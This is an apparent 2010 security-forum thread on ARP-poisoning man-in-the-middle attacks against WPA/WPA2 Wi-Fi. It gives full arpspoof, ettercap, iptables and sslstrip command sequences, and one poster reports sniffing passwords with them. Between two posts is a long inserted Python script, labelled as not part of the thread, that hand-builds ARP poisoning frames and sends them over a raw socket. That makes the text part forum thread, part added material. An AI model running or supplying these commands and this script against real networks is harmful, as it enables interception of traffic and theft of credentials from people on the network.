
Thread: Is Arp-Poisoning MITM attack possible on WPA network?


  1. #1 (Just burned his ISO; joined May 2010; Somewhere...; 12 posts)

    Is Arp-Poisoning MITM attack possible on WPA network?

    Hi guys,
    I've been piddling around with ARP poisoning using Ettercap-ng and Arpspoof along with Sslstrip and various Dsniff programs like urlsnarf, webspy, etc. I can successfully perform a MITM on my open network and on my network with WEP encryption enabled, but I would like to be able to do the same on it with WPA encryption enabled. (Obviously I know the passkey because it's my network.)
    I was previously under the impression that it was difficult or impossible to perform ARP poisoning on a WPA-encrypted network, due to the fact that merely knowing the passkey is not sufficient to decrypt the packets because of the WPA handshake. Then I stumbled upon this thread, "http://www.backtrack-linux.org/forums/old-newbie-area/24774-ettercap-wpa.html", which claimed that performing a MITM attack on a WPA network is done exactly the same as on an unencrypted network (no handshake or passkey stuff required as long as you're connected to the AP).
    Incidentally, I have tried performing the attack just like on an unencrypted network (except I tried both Arpspoof and Ettercap-ng), but I end up DoSing both myself and my victim laptop.

    So, my questions are:

    1. Is the answer in that thread correct in saying that performing a MITM attack on a WPA network is done the same as on an open network?

    2. If the answer to question 1 is "yes", then what am I doing wrong? (I will post my commands if that is the case.)

    Thanks in advance!

  2. #2 TAPE (Very good friend of the forum; joined Jan 2010; Europe; 599 posts)

    Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Well you're connected to the network right ? So yes..

    Posting commands used is always good to allow people to see what you have tried.

  3. #3 (Just burned his ISO; joined May 2010; Somewhere...; 12 posts)

    Re: Is Arp-Poisoning MITM attack possible on WPA network?

    OK, thanks. I appreciate the help. I'm fairly certain it's not a driver issue because, as I said before, aircrack-ng works fine. I am using BackTrack 4 running on a Dell Mini 9 with an Intel 5100 card.

    Here are my commands. Obviously they are run as root.

    Using Arpspoof:
    Code:
    # enable IPv4 forwarding so the victim's traffic is relayed instead of dropped
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    # redirect intercepted HTTP (TCP/80) to the local sslstrip listener on 8080
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    
    # sslstrip: -k kills existing sessions, -f fakes the favicon lock, -l listens on 8080
    # (runs in the foreground; give it its own terminal)
    sslstrip -k -f -l 8080
    
    # tell 192.168.1.7 that the gateway 192.168.1.1 is at our MAC (also runs in the foreground)
    arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1
    Using Ettercap-NG:
    Code:
    # enable IPv4 forwarding so the victim's traffic is relayed instead of dropped
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    # redirect intercepted HTTP (TCP/80) to the local sslstrip listener on 8080
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    
    # sslstrip in its own terminal (see above)
    sslstrip -k -f -l 8080
    
    # text UI, quiet, ARP MITM; empty target specs (// //) mean every host on the subnet
    ettercap -Tq -i wlan0 -M ARP // //
    Also, for etter.conf I have changed ec_uid to 0 and ec_gid to 0. I did not uncomment the iptables line since I was using Sslstrip.

    Thanks for the help! I really appreciate it.

  4. #4 (Just burned his ISO; joined May 2010; Somewhere...; 12 posts)

    Re: Is Arp-Poisoning MITM attack possible on WPA network?

    OK, I figured it out. Thanks TAPE for clarifying that it's possible. For all those who may read this post in the future I would like to clarify:
    Contrary to what some other sites (I can't remember specifically, but I've read it somewhere) say, it is entirely possible to perform a MITM attack using Arpspoof (and probably Ettercap too, but I haven't got it to work yet) on a WPA or WPA2 encrypted network. I successfully used Arpspoof and Sslstrip to sniff passwords on my WPA2 network. I'm sure many, many people have done this before, but I had spent a long time trying to find out if it was even possible, which it is.

    Just in case anyone is wondering what commands I used:
    Code:
    # forwarding first, or the poisoned victim's traffic is blackholed
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    # poison 192.168.1.5's cache for the gateway 192.168.1.1 (foreground; own terminal)
    arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1
    
    # send intercepted HTTP to sslstrip on 8080
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    
    cd /home/christopher/.sslstrip-0.7 # of course you will have to change this to your location
    
    # sslstrip from source (foreground; own terminal)
    python sslstrip.py -k -f -l 8080

  5. #5 TAPE (Very good friend of the forum; joined Jan 2010; Europe; 599 posts)

    Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Perhaps best to first try and single out a specific host with ettercap:
    Code:
    # /victim/ /gateway/; "remote" makes ettercap relay the victim's traffic to hosts beyond the gateway
    ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/

  6. #6 Gitsnik (Very good friend of the forum; joined Jan 2010; The Crystal Wind; 851 posts)

    Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Quote Originally Posted by TAPE:
    Perhaps best to first try and single out a specific host with ettercap
    Code:
    ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/
    Also, rather than using the tools, learn how this sort of thing works: it is possible to hand-generate our ARP packets and send them off. Less network traffic lets you learn what's going on and also reason out why things would be hurting a bit here.
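The hand-generated ARP packets Gitsnik refers to, as an added example that is not part of this thread or any poster's code. It builds the unsolicited ARP replies that arpspoof and ettercap send (victim told the gateway is at our MAC, gateway told the victim is at our MAC), parses them back so the spoofed binding can be checked, builds the "restore" replies that put both caches back, and can push frames out of a raw AF_PACKET socket on Linux (root required). The IPs 192.168.1.7 and 192.168.1.1 come from the thread; the MAC addresses and the function names are constructed for the example. Standard library only.

```python
#!/usr/bin/env python3
"""Hand-built ARP reply frames for an ARP-poisoning MITM, plus the frames
that restore the real bindings afterwards. Standard library only."""
import os
import socket
import struct
import time

ETH_P_ARP = 0x0806          # EtherType for ARP
HTYPE_ETHERNET = 1
PTYPE_IPV4 = 0x0800
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa


def mac_bytes(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str,
                    target_mac: str, target_ip: str) -> bytes:
    """Ethernet II header + 28-byte ARP reply saying "sender_ip is at
    sender_mac", unicast to target_mac. Unsolicited replies like this, resent
    every couple of seconds, are what keep a neighbour's cache poisoned."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT, HTYPE_ETHERNET, PTYPE_IPV4, 6, 4, ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode a frame built above (or one sniffed off the wire) so the
    claimed IP->MAC binding can be inspected."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet+ARP")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError(f"not ARP: ethertype {ethertype:#06x}")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"eth_dst": mac_str(dst), "eth_src": mac_str(src), "opcode": op,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def poison_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """Both directions, as ettercap -M arp:remote does: the victim learns
    gateway_ip -> attacker_mac, the gateway learns victim_ip -> attacker_mac."""
    return [build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
            build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)]


def restore_frames(victim_mac, victim_ip, gateway_mac, gateway_ip):
    """Re-announce the real bindings so both hosts recover when we stop;
    skipping this leaves the victim cut off until its cache entry expires."""
    return [build_arp_reply(gateway_mac, gateway_ip, victim_mac, victim_ip),
            build_arp_reply(victim_mac, victim_ip, gateway_mac, gateway_ip)]


def forwarding_enabled() -> bool:
    """Linux check: poisoning without ip_forward=1 just blackholes the victim."""
    path = "/proc/sys/net/ipv4/ip_forward"
    if not os.path.exists(path):
        return False
    with open(path) as fh:
        return fh.read().strip() == "1"


def send_frames(iface: str, frames, repeat: int = 1, interval: float = 2.0) -> int:
    """Push raw frames out of iface (Linux, needs root/CAP_NET_RAW).
    Returns the number of frames sent."""
    sent = 0
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        for i in range(repeat):
            for f in frames:
                s.send(f)
                sent += 1
            if i + 1 < repeat:
                time.sleep(interval)
    return sent


if __name__ == "__main__":
    # Constructed sample MACs (assumptions); the IPs are the ones used in the thread.
    ATTACKER, VICTIM, GATEWAY = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "cc:dd:ee:ff:00:11"
    frames = poison_frames(ATTACKER, VICTIM, "192.168.1.7", GATEWAY, "192.168.1.1")
    for f in frames:
        print(parse_arp(f))
    print("ip_forward on:", forwarding_enabled())
    # As root on the attacking box, after checking forwarding_enabled():
    #   send_frames("wlan0", frames, repeat=30)
    #   send_frames("wlan0", restore_frames(VICTIM, "192.168.1.7", GATEWAY, "192.168.1.1"), repeat=3)
```

Sending two 42-byte frames every couple of seconds is all the tools do; watching `arp -a` on the victim before and after (and after the restore frames) shows exactly which entry changed, which is the point Gitsnik makes about reasoning out why a noisier full-subnet run hurts.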

  7. #7 (Just burned his ISO; joined May 2010; Somewhere...; 12 posts)

    Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Thanks, guys! Actually, I've got it working with Ettercap in the meantime, using the same commands as on an unencrypted network. Sorry I'm so slow to post. Thanks for the help, TAPE; I actually had set specific targets, I just typed it wrong in my post, but thanks for your time.
    Also, Gitsnik, thanks for the tip; I'll look into making my own ARP packets. That sounds like a useful thing to know how to do. I really appreciate you guys.
    I will mark this thread as solved.
    Thanks!

    edit: Actually, I can't figure out how to mark this thread as solved. If this is important, please let me know how; otherwise I will assume that only the admins can do that. Thanks, guys.
    Last edited by BobaFett; 06-01-2010 at 11:24 PM.
